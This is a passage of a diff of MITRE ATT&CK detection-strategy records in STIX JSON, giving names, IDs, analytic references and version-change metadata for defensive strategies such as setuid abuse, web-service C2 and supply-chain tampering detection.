+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0110",
+                            "external_id": "DET0110"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Setuid/Setgid Privilege Abuse Detection (Linux/macOS)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c7d513f4-5113-4031-8125-7f145128c2e1",
+                        "x-mitre-analytic--08314a8b-becd-4853-8a6c-dd5a947b36c0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b4cdf164-9cb7-4cad-bdc3-81b5574f364a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0162",
+                            "external_id": "DET0162"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Socket-filter trigger \u2192 on-host raw-socket activity \u2192 reverse connection (T1205.002)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--98d733c2-370b-4cd0-8ec6-226a1ca19604",
+                        "x-mitre-analytic--c19f8f89-76f9-4345-8bb6-a065fba50bff",
+                        "x-mitre-analytic--e6d04b50-7bdc-480e-9bda-291db9b270f6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ec870f2d-bba3-43f9-95b8-c2f85678dba4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0009",
+                            "external_id": "DET0009"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Supply-chain tamper in dependencies/dev-tools (manager\u2192write/install\u2192first-run\u2192egress)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9ec9d296-173f-4e47-8bc4-d20d558e6e18",
+                        "x-mitre-analytic--9e95639e-633f-47cf-b343-3ea771c19192",
+                        "x-mitre-analytic--0f186e7f-fe33-45d6-ba1e-02a334cf1cb3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--13233865-3b73-4065-a056-43fcd6eb6ed5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0310",
+                            "external_id": "DET0310"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Suspicious Addition to Local or Domain Groups",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--58bed5f5-6ef5-4558-9ac9-b58f8aa9888c",
+                        "x-mitre-analytic--ff692121-8bbd-4d22-8192-fe6a7dd94f57",
+                        "x-mitre-analytic--03b0d93e-955a-49f6-83ad-8cf72b678367"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--18fe3660-c079-4522-b1d7-7ce7f65f9686",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0242",
+                            "external_id": "DET0242"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Suspicious Database Access and Dump Activity Across Environments (T1213.006)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--147c0305-abff-4bc3-ae2a-acd69d0b87fd",
+                        "x-mitre-analytic--d869b672-c3e9-446c-9e7a-c9ce5888794c",
+                        "x-mitre-analytic--3e87713d-d062-413c-9643-97df331ba651",
+                        "x-mitre-analytic--041812fa-5446-47cc-8ca0-1106f4874c10",
+                        "x-mitre-analytic--544c832f-4849-4fb7-a851-5f69ec0692a9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bbeacdc8-c14c-44f1-9ace-fc8282a05c67",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0036",
+                            "external_id": "DET0036"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Suspicious Device Registration via Entra ID or MFA Platform",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--108a10d2-4a9e-4c11-8a6f-42c8b60f0f52",
+                        "x-mitre-analytic--d5dc64ab-bb69-4893-a155-84d403040e1a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7c27cb31-4806-479f-a07b-900450236a57",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0572",
+                            "external_id": "DET0572"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Suspicious RoleBinding or ClusterRoleBinding Assignment in Kubernetes",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b721ae18-79fc-4b82-8991-93980b14ded5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--769615c5-08d5-4f51-8f3b-7ac2f1febce8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0425",
+                            "external_id": "DET0425"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Suspicious Use of Web Services for C2",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5a10a19a-035e-469e-8ec5-fafb1f0f0fe6",
+                        "x-mitre-analytic--6e053521-1d6d-493f-8cd5-34f9a5992fc7",
+                        "x-mitre-analytic--aff88199-cad0-47f8-b065-0ad7a86ec8a7",
+                        "x-mitre-analytic--900bc498-4b81-43b6-bec2-3b55edc5c0ff"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--75161d5e-2b6d-4112-ab4d-338f70ea97f0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0525",
+                            "external_id": "DET0525"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "System Discovery via Native and Remote Utilities",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--54bfcc92-e04c-4eac-9aa2-c10b7574088c",
+                        "x-mitre-analytic--eca769c3-9497-4c87-b624-4003fd1b0304",
+                        "x-mitre-analytic--85a20f4b-4171-4450-a34f-17725d44aad9",
+                        "x-mitre-analytic--164a04c5-db61-477f-b3fa-8bf806631fbb",
+                        "x-mitre-analytic--d664b158-5035-4e0b-a069-7a5b27ce0936",
+                        "x-mitre-analytic--3ff23082-b5c6-47c0-8d76-a2d6fa88e622"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2250ba04-1b95-4c72-9373-d87e8c1d7869",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0447",
+                            "external_id": "DET0447"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "T1136.001 Detection Strategy - Local Account Creation Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4e4c318b-5da0-46f7-aed2-d37828e4831b",
+                        "x-mitre-analytic--ee065e5f-5a04-49bd-b2b6-33b404ac37c7",
+                        "x-mitre-analytic--45e8fdaf-60cc-46db-a9fd-5dc18c8db6bb",
+                        "x-mitre-analytic--b7a63a7c-e8c2-4a25-becf-299ea45996e5",
+                        "x-mitre-analytic--ac204e03-5c8c-4e29-929c-780145a98669",
+                        "x-mitre-analytic--614594ba-9590-4fa9-871c-3e092882c74c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--aae40136-73f7-45e8-a37f-104ae7155bbe",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0003",
+                            "external_id": "DET0003"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "T1136.002 Detection Strategy - Domain Account Creation Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--86103b48-cd6d-447d-aef4-807e10355506",
+                        "x-mitre-analytic--e86081ab-aad1-48a1-abd8-5a5c8c7c936a",
+                        "x-mitre-analytic--03513eb2-6dbd-4160-94dd-25d2bce349be"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f1fdcaa2-7040-4cea-a934-7397566a312b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0534",
+                            "external_id": "DET0534"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "TCC Database Manipulation via Launchctl and Unprotected SIP",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c0766f2c-e282-44a1-8dcf-1575d77658da"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--481a55d3-5f23-4428-9438-0220eab78678",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0566",
+                            "external_id": "DET0566"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Template Injection Detection - Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dea5f6cc-d3bb-404b-8aab-f7366988a96e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1e601759-c5d1-45cc-97a1-972967426794",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0524",
+                            "external_id": "DET0524"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Traffic Signaling (Port-knock / magic-packet \u2192 firewall or service activation) \u2013 T1205",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0848a778-7bcf-48d9-a14a-d29d1e71e656",
+                        "x-mitre-analytic--2e7a9609-3e4b-477b-828f-f486561d7fa7",
+                        "x-mitre-analytic--48d2effa-7fc0-4790-9cc9-bbe573c29301",
+                        "x-mitre-analytic--ac933d77-bdb6-45ed-8fb5-87bae6f225cb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3243e976-0cf8-4f18-8b50-38b9ee5bfc4c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0351",
+                            "external_id": "DET0351"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Unix-like File Permission Manipulation Behavioral Chain Detection Strategy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--971ddd36-1ecd-46bf-b94c-22e8f05c1462",
+                        "x-mitre-analytic--2d21fb1f-f9c3-4e72-a6dd-3d7872be3294"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0dabfa5e-9c35-48ec-b825-ff1cce7a3d00",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0340",
+                            "external_id": "DET0340"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "User Execution \u2013 Malicious Copy & Paste (browser/email \u2192 shell with obfuscated one-liner) \u2013 T1204.004",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8cb0a7da-942b-4771-b9d5-cf558755677a",
+                        "x-mitre-analytic--1895e723-dcfb-45d4-80fc-aaa0c3963cc9",
+                        "x-mitre-analytic--acf0fdbb-6fbf-42c0-acc4-75a545c24f90"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e2023eb5-d813-4a08-985e-e8c998672037",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0294",
+                            "external_id": "DET0294"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "User Execution \u2013 Malicious File via download/open \u2192 spawn chain (T1204.002)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--328d639e-6b8d-400c-9cdd-3c255d343e47",
+                        "x-mitre-analytic--5becf65d-da9f-46e1-8edc-eea05c9dc6cb",
+                        "x-mitre-analytic--e0b64d4e-79e0-47b8-a95c-414e2b69406d"
